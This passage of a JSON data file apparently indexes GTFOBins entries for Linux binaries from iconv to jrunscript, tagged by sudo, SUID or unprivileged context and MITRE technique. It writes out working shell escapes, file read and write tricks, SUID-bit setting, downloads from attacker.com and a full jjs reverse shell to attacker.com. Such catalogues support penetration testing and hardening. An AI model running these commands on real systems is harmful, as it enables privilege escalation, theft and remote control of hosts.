/path/to/input-file","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/iconv/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:iconv:file-write:0:sudo","toolId":"gtfo:iconv","toolName":"iconv","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"echo DATA | iconv -f 8859_1 -t 8859_1 -o /path/to/output-file","mitre":["T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/iconv/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:iconv:file-write:0:suid","toolId":"gtfo:iconv","toolName":"iconv","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"echo DATA | iconv -f 8859_1 -t 8859_1 -o /path/to/output-file","mitre":["T1565"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/iconv/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:iconv:file-write:0:unprivileged","toolId":"gtfo:iconv","toolName":"iconv","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write"],"nativeCategory":["file-write"],"command":"echo DATA | iconv -f 8859_1 -t 8859_1 -o /path/to/output-file","mitre":["T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/iconv/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:iftop:shell:0:sudo","toolId":"gtfo:iftop","toolName":"iftop","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"iftop\n!/bin/sh","description":"This requires the privilege to capture on some device (specify with `-i` if needed).","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/iftop/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:iftop:shell:0:suid","toolId":"gtfo:iftop","toolName":"iftop","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"iftop\n!/bin/sh","description":"This requires the privilege to capture on some device (specify with `-i` if needed).","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/iftop/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:iftop:shell:0:unprivileged","toolId":"gtfo:iftop","toolName":"iftop","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"iftop\n!/bin/sh","description":"This requires the privilege to capture on some device (specify with `-i` if needed).","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/iftop/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:install:privilege-escalation:0:sudo","toolId":"gtfo:install","toolName":"install","name":"privilege-escalation","source":"GTFOBins","platform":["Linux"],"capability":["Privilege Escalation"],"nativeCategory":["privilege-escalation"],"command":"install -m 6777 /path/to/input-file /path/to/output-dir/","description":"This can be run with elevated privileges to change permissions (`6` denotes the SUID bits) and then read, write, or execute a file.","mitre":["T1548"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/install/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:install:privilege-escalation:0:suid","toolId":"gtfo:install","toolName":"install","name":"privilege-escalation","source":"GTFOBins","platform":["Linux"],"capability":["Privilege Escalation"],"nativeCategory":["privilege-escalation"],"command":"install -m 6777 /path/to/input-file /path/to/output-dir/","description":"This can be run with elevated privileges to change permissions (`6` denotes the SUID bits) and then read, write, or execute a file.","mitre":["T1548"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/install/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:ionice:shell:0:sudo","toolId":"gtfo:ionice","toolName":"ionice","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"ionice /bin/sh","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/ionice/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:ionice:shell:0:suid","toolId":"gtfo:ionice","toolName":"ionice","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"ionice /bin/sh -p","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/ionice/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:ionice:shell:0:unprivileged","toolId":"gtfo:ionice","toolName":"ionice","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"ionice /bin/sh","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/ionice/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:ip:file-read:0:sudo","toolId":"gtfo:ip","toolName":"ip","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"ip -force -batch /path/to/input-file","description":"The read file content is corrupted by error prints.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/ip/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:ip:file-read:0:suid","toolId":"gtfo:ip","toolName":"ip","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"ip -force -batch /path/to/input-file","description":"The read file content is corrupted by error prints.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/ip/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:ip:file-read:0:unprivileged","toolId":"gtfo:ip","toolName":"ip","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"ip -force -batch /path/to/input-file","description":"The read file content is corrupted by error prints.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/ip/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:ip:shell:0:sudo","toolId":"gtfo:ip","toolName":"ip","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"ip netns add foo\nip netns exec foo /bin/sh\nip netns delete foo","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/ip/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:ip:shell:0:suid","toolId":"gtfo:ip","toolName":"ip","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"ip netns add foo\nip netns exec foo /bin/sh -p\nip netns delete foo","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/ip/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:ip:shell:1:sudo","toolId":"gtfo:ip","toolName":"ip","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"ip netns add foo\nip netns exec foo /bin/ln -s /proc/1/ns/net /var/run/netns/bar\nip netns exec bar /bin/sh\nip netns delete foo\nip netns delete bar","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/ip/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:iptables-save:file-write:0:sudo","toolId":"gtfo:iptables-save","toolName":"iptables-save","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"iptables -A INPUT -i lo -j ACCEPT -m comment --comment DATA\niptables -S\niptables-save -f /path/to/output-file","description":"The content is written along with a number of `iptables` rules.","mitre":["T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/iptables-save/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:irb:inherit:0:sudo","toolId":"gtfo:irb","toolName":"irb","name":"inherit ← ruby","source":"GTFOBins","platform":["Linux"],"capability":["File Download","File Read","File Write","Library Load","Reverse/Bind Shell","Execution","File Upload","Privilege Escalation"],"nativeCategory":["inherit","from:ruby"],"command":"irb\n...","description":"This allows to run Ruby code (`...`).","mitre":["T1105","T1005","T1565","T1574","T1059","T1071","T1041"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/irb/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:irb:inherit:0:unprivileged","toolId":"gtfo:irb","toolName":"irb","name":"inherit ← ruby","source":"GTFOBins","platform":["Linux"],"capability":["File Download","File Read","File Write","Library Load","Reverse/Bind Shell","Execution","File Upload"],"nativeCategory":["inherit","from:ruby"],"command":"irb\n...","description":"This allows to run Ruby code (`...`).","mitre":["T1105","T1005","T1565","T1574","T1059","T1071","T1041"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/irb/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:ispell:shell:0:sudo","toolId":"gtfo:ispell","toolName":"ispell","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"ispell /etc/hosts\n!/bin/sh","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/ispell/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:ispell:shell:0:suid","toolId":"gtfo:ispell","toolName":"ispell","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"ispell /etc/hosts\n!/bin/sh -p","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/ispell/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:ispell:shell:0:unprivileged","toolId":"gtfo:ispell","toolName":"ispell","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"ispell /etc/hosts\n!/bin/sh","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/ispell/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:java:shell:0:sudo","toolId":"gtfo:java","toolName":"java","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"java Shell","description":"The `Shell.class` class file can be compiled offline, then uploaded to the target:\n\n```\ncat >Shell.java <<EOF\npublic class Shell {\n public static void main(String[] args) throws Exception {\n new ProcessBuilder(\"/bin/sh\").inheritIO().start().waitFor();\n }\n}\nEOF\n\njavac Shell.java\n```","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/java/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:java:shell:0:unprivileged","toolId":"gtfo:java","toolName":"java","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"java Shell","description":"The `Shell.class` class file can be compiled offline, then uploaded to the target:\n\n```\ncat >Shell.java <<EOF\npublic class Shell {\n public static void main(String[] args) throws Exception {\n new ProcessBuilder(\"/bin/sh\").inheritIO().start().waitFor();\n }\n}\nEOF\n\njavac Shell.java\n```","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/java/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:jjs:download:0:sudo","toolId":"gtfo:jjs","toolName":"jjs","name":"download","source":"GTFOBins","platform":["Linux"],"capability":["File Download","Privilege Escalation"],"nativeCategory":["download"],"command":"jjs\nvar URL = Java.type('java.net.URL');\nvar ws = new URL('http://attacker.com/path/to/input-file');\nvar Channels = Java.type('java.nio.channels.Channels');\nvar rbc = Channels.newChannel(ws.openStream());\nvar FileOutputStream = Java.type('java.io.FileOutputStream');\nvar fos = new FileOutputStream('/path/to/output-file');\nfos.getChannel().transferFrom(rbc, 0, Number.MAX_VALUE);\nfos.close();\nrbc.close();","mitre":["T1105"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/jjs/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:jjs:download:0:unprivileged","toolId":"gtfo:jjs","toolName":"jjs","name":"download","source":"GTFOBins","platform":["Linux"],"capability":["File Download"],"nativeCategory":["download"],"command":"jjs\nvar URL = Java.type('java.net.URL');\nvar ws = new URL('http://attacker.com/path/to/input-file');\nvar Channels = Java.type('java.nio.channels.Channels');\nvar rbc = Channels.newChannel(ws.openStream());\nvar FileOutputStream = Java.type('java.io.FileOutputStream');\nvar fos = new FileOutputStream('/path/to/output-file');\nfos.getChannel().transferFrom(rbc, 0, Number.MAX_VALUE);\nfos.close();\nrbc.close();","mitre":["T1105"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/jjs/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:jjs:file-read:0:sudo","toolId":"gtfo:jjs","toolName":"jjs","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"jjs\nvar BufferedReader = Java.type('java.io.BufferedReader');\nvar FileReader = Java.type('java.io.FileReader');\nvar br = new BufferedReader(new FileReader('/path/to/input-file'));\nwhile ((line = br.readLine()) != null) { print(line); }","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/jjs/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:jjs:file-read:0:unprivileged","toolId":"gtfo:jjs","toolName":"jjs","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"jjs\nvar BufferedReader = Java.type('java.io.BufferedReader');\nvar FileReader = Java.type('java.io.FileReader');\nvar br = new BufferedReader(new FileReader('/path/to/input-file'));\nwhile ((line = br.readLine()) != null) { print(line); }","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/jjs/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:jjs:file-write:0:sudo","toolId":"gtfo:jjs","toolName":"jjs","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"jjs\nvar FileWriter = Java.type('java.io.FileWriter');\nvar fw=new FileWriter('/path/to/output-file');\nfw.write('DATA');\nfw.close();","mitre":["T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/jjs/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:jjs:file-write:0:unprivileged","toolId":"gtfo:jjs","toolName":"jjs","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write"],"nativeCategory":["file-write"],"command":"jjs\nvar FileWriter = Java.type('java.io.FileWriter');\nvar fw=new FileWriter('/path/to/output-file');\nfw.write('DATA');\nfw.close();","mitre":["T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/jjs/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:jjs:reverse-shell:0:sudo","toolId":"gtfo:jjs","toolName":"jjs","name":"reverse-shell","source":"GTFOBins","platform":["Linux"],"capability":["Reverse/Bind Shell","Privilege Escalation"],"nativeCategory":["reverse-shell"],"command":"jjs\nvar host='attacker.com';\nvar port=12345;\nvar ProcessBuilder = Java.type('java.lang.ProcessBuilder');\nvar p=new ProcessBuilder('/bin/sh', '-i').redirectErrorStream(true).start();\nvar Socket = Java.type('java.net.Socket');\nvar s=new Socket(host,port);\nvar pi=p.getInputStream(),pe=p.getErrorStream(),si=s.getInputStream();\nvar po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){ while(pi.available()>0)so.write(pi.read()); while(pe.available()>0)so.write(pe.read()); while(si.available()>0)po.write(si.read()); so.flush();po.flush(); Java.type('java.lang.Thread').sleep(50); try {p.exitValue();break;}catch (e){}};p.destroy();s.close();","mitre":["T1059","T1071"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/jjs/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:jjs:reverse-shell:0:unprivileged","toolId":"gtfo:jjs","toolName":"jjs","name":"reverse-shell","source":"GTFOBins","platform":["Linux"],"capability":["Reverse/Bind Shell"],"nativeCategory":["reverse-shell"],"command":"jjs\nvar host='attacker.com';\nvar port=12345;\nvar ProcessBuilder = Java.type('java.lang.ProcessBuilder');\nvar p=new ProcessBuilder('/bin/sh', '-i').redirectErrorStream(true).start();\nvar Socket = Java.type('java.net.Socket');\nvar s=new Socket(host,port);\nvar pi=p.getInputStream(),pe=p.getErrorStream(),si=s.getInputStream();\nvar po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){ while(pi.available()>0)so.write(pi.read()); while(pe.available()>0)so.write(pe.read()); while(si.available()>0)po.write(si.read()); so.flush();po.flush(); Java.type('java.lang.Thread').sleep(50); try {p.exitValue();break;}catch (e){}};p.destroy();s.close();","mitre":["T1059","T1071"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/jjs/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:jjs:shell:0:sudo","toolId":"gtfo:jjs","toolName":"jjs","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"jjs\nJava.type('java.lang.Runtime').getRuntime().exec('/bin/sh -c $@|sh _ echo sh </dev/tty >/dev/tty 2>/dev/tty').waitFor()","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/jjs/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:jjs:shell:0:unprivileged","toolId":"gtfo:jjs","toolName":"jjs","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"jjs\nJava.type('java.lang.Runtime').getRuntime().exec('/bin/sh -c $@|sh _ echo sh </dev/tty >/dev/tty 2>/dev/tty').waitFor()","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/jjs/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:joe:shell:0:sudo","toolId":"gtfo:joe","toolName":"joe","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"joe\n^K!/bin/sh","description":"The terminal is spawn int the terminal interface.","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/joe/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:joe:shell:0:suid","toolId":"gtfo:joe","toolName":"joe","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"joe\n^K!/bin/sh","description":"The terminal is spawn int the terminal interface.","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/joe/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:joe:shell:0:unprivileged","toolId":"gtfo:joe","toolName":"joe","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"joe\n^K!/bin/sh","description":"The terminal is spawn int the terminal interface.","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/joe/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:join:file-read:0:sudo","toolId":"gtfo:join","toolName":"join","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"join -a 2 /dev/null /path/to/input-file","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/join/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:join:file-read:0:suid","toolId":"gtfo:join","toolName":"join","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"join -a 2 /dev/null /path/to/input-file","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/join/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:join:file-read:0:unprivileged","toolId":"gtfo:join","toolName":"join","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"join -a 2 /dev/null /path/to/input-file","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/join/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:journalctl:inherit:0:sudo","toolId":"gtfo:journalctl","toolName":"journalctl","name":"inherit ← less","source":"GTFOBins","platform":["Linux"],"capability":["Execution","File Read","File Write","Privilege Escalation"],"nativeCategory":["inherit","from:less"],"command":"journalctl","mitre":["T1059","T1005","T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/journalctl/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:journalctl:inherit:0:unprivileged","toolId":"gtfo:journalctl","toolName":"journalctl","name":"inherit ← less","source":"GTFOBins","platform":["Linux"],"capability":["Execution","File Read","File Write"],"nativeCategory":["inherit","from:less"],"command":"journalctl","mitre":["T1059","T1005","T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/journalctl/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:jq:file-read:0:sudo","toolId":"gtfo:jq","toolName":"jq","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"jq -Rr . /path/to/input-file","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/jq/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:jq:file-read:0:suid","toolId":"gtfo:jq","toolName":"jq","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"jq -Rr . /path/to/input-file","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/jq/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:jq:file-read:0:unprivileged","toolId":"gtfo:jq","toolName":"jq","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"jq -Rr . /path/to/input-file","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/jq/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:jrunscript:download:0:sudo","toolId":"gtfo:jrunscript","toolName":"jrunscript","name":"download","source":"GTFOBins","platform":["Linux"],"capability":["File Download","Privilege Escalation"],"nativeCategory":["download"],"command":"jrunscript -e 'cp(\"http://attacker.com/path/to/input-file\",\"/path/to/output-file\")'","mitre":["T1105"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/jrunscript/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:jrunscript:download:0:unprivileged","toolId":"gtfo:jrunscript","toolName":"jrunscript","name":"download","source":"GTFOBins","platform":["Linux"],"capability":["File Download"],"nativeCategory":["download"],"command":"jrunscript -e 'cp(\"http://attacker.com/path/to/input-file\",\"/path/to/output-file\")'","mitre":["T1105"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/jrunscript/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check 